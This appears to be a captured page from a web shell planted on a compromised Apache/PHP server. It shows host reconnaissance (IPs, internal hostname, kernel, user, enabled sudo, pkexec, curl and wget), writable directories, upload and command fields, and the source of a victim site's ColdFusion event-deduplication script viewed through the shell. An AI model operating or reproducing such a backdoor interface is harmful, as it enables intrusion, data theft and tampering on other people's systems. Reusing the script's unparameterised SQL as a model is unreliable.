403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/cgny/public_html/newadmin/scheduled/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/cgny/public_html/newadmin/scheduled/cgfirefire.cfm
 <Cfquery name="geter" dataSource="#ds#">
select id,hours,activityname,name,address,address2,phone,website,ages,price,description,datestart,dateend,seo_friendly,usepicprint,photo,cgpriority,age6
    from ActivityPlanner
    where 1=1
    and dateend > '2017-11-01'
and activityname = 'West Village Chorale Annual Messiah Sing'
    and id <> 255477
    and status=0
and (catid > 0 or catid2 > 0)
and (catid3 = 0 and catid4 = 0)


    order by datestart,name
 </cfquery>
 
<Cfoutput query="Geter">
	 <a href="https://www.cityguideny.com/admin/editcalendar.cfm?id=#id#">#activityname# at #name#</a> -  #dateformat(datestart,'m/d/yyyy')# to #dateformat(datestart,'m/d/yyyy')# @ #hours# 
	<Cfif #activityname# eq #activityname[currentrow-1]#
		and datestart eq #datestart[currentrow-1]#
		and dateend eq #datestart[currentrow-1]#
			
			><font color="red"><b>DUPE <cfif hours eq #hours[currentrow-1]#> HOURS SAME
				
				<cfquery name="del" dataSource="#ds#">
					delete from ActivityPlanner where id = #id#
				</cfquery>	
				
				- #ID#
				
				<cfelse>

<Font color="black">#hours[currentrow-1]#, #hours#</Font>	
				
				<Cfquery name="upds" dataSource="#ds#">
					update ActivityPlanner
					set hours = '#hours[currentrow-1]#, #hours#'
					where id = #id[currentrow-1]#
				</cfquery>
				
						
				<cfquery name="del" dataSource="#ds#">
					delete from ActivityPlanner where id = #id#
				</cfquery>	
					
				
				HOURS DIFFERENT</cfif></b></font></Cfif>
	
	<br>
	
 </Cfoutput>	    

Youez - 2016 - github.com/yon3zu
LinuXploit